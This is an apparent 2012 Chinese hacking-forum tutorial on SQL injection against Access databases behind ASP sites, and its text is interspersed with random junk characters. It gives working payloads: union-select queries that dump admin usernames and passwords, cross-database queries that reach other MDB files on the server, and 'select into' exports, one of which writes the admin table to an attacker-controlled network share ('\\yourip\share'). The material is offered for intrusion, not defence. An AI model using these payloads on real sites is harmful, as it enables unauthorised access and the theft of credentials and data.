--------------------------------------------------------------1 ?, Z9 t+ [2 V- v1 | Q
union查询法
2 ~/ h4 t( J0 C# n; x+ M3 d首先要说的就是查询办法,一般的查询办法就是) R9 M2 n$ d% B4 d3 P2 h
" u2 y) D1 ]7 V) l( ^8 W: q) ?程序代码1 N0 h) ^, {+ o) F
and 1=(select count(*) from admin where left(id,1)='1')
( I2 C! e" p$ s5 y2 Q5 Q
# x& v# N" U0 j: d2 x这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
: u8 @( K- q# u9 }1 b2 Y% u7 @所以这个时候,union select横空出现.别以为只能在PHP里用哦...* Q! W% k7 o* \9 ]* H
譬如你有一个ACCESS点:" i- ?$ N* `( a( E4 U1 e
程序代码
' Y# s0 u. D$ K- i) hhttp://bbs.tian6.com/xiaoyang.asp?coder=1
- X) ]/ A4 d( i% O! }9 Z$ S) N8 n, n, g" T! ^) u
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
' w. ?- Y, ^ W# @; H然后我们直接来:, i/ L! f! K' t$ i& y8 d- d* J
程序代码
2 E: z5 a4 ^" G6 a# E- N$ Phttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
: Q) [7 t* ]' s5 z u8 h, \* J; t
5 H3 k4 j) b8 v) F这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.1 F8 m" ^' G: |2 k( w D X M
% z5 e4 D& h) P4 b( M
% `6 m: A' k+ v3 V: A$ l$ |3 k4 y5 N( d' \6 d) {! _
---------------------------------------------------------------
/ l7 D( e+ g# bAccess跨库查询1 q( W6 l. m, [$ g* b, D1 d/ I
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.: q) m/ e$ W: r0 y! p5 n5 L
跨库的查询语句:% h+ P" h+ i8 ^& V" j" y, o) g \
子查询:" {( P$ {+ ?* E. z4 F
程序代码
+ @6 j, v B- `" r; Hand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
; i) E5 @% T7 k: ~" a. F& S" w* Q/ E% T: ~+ ]/ E
union查询:5 U X$ B" c, ]
程序代码
4 P& Z6 E: q5 [union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
- n/ F' s H4 Z* R! |
. w6 K v0 k% d/ f7 |; I& ]1 j9 x1 C跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:" b/ g6 Y2 R' E( Z5 j3 J: a0 C' V9 J
程序代码 _: ~" D8 ]2 _, O# r; T) L
http://www.4ngel.net/article/46.htm
4 Q$ s' z4 |" l( Phttp://hf110.com/Article/hack/rqsl/200502/66.html
2 z# V, e* _: z# `8 V
- V7 O9 Z: d1 Z- x1 C ], G5 x---------------------------------------------------------------
5 Y+ c+ X- M& B" V5 ^0 MAccess注入,导出txt,htm,html
! k, Q( K& b- \+ ]3 B, Y子查询语句:
. n/ u" a8 t! ?1 j8 ]5 N% n9 _4 b程序代码
! f0 C- s# ~/ s5 `) RSelect * into [test.txt] in 'd:\web\' 'text;' from admin" W5 Y3 }# {6 a- N
1 B% ` r) i0 r9 h5 {9 ^
这样就把admin表的内容以test类型存进了d:\web里面.
" t5 ]% D# X/ K9 {$ kUNION查询:6 h. v, i. [& V9 W
程序代码
, N) [5 H& y2 h, D8 A. m3 ounion select * into [admin.txt] in 'c:\' 'test;' from admin4 q% C0 W+ o0 Q& T
) Z: W6 u$ G0 J. }
而且这里也可以保存到本地来:- r3 G: t# T1 K, z2 ^ ?
程序代码" Q" J! @0 k& h0 v; j5 j
Select * into [test.txt] in '\\yourip\share' 'text;' from admin0 k4 I7 G8 [0 ]4 E
- Q& h6 t; D6 G0 X0 ~( y
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:% `% V) q6 t l' S
- g: k V7 a1 \3 O+ r( Z程序代码
* F4 b) G/ r0 N2 ?0 rhttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
w/ d( \1 X$ c& w0 K, A \5 w5 _1 K9 Z; s- B7 r7 g3 F
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
/ E4 V2 }& {; Q" d2 \: q |
发表于 2012-9-15 14:20:57
收藏
支持
反对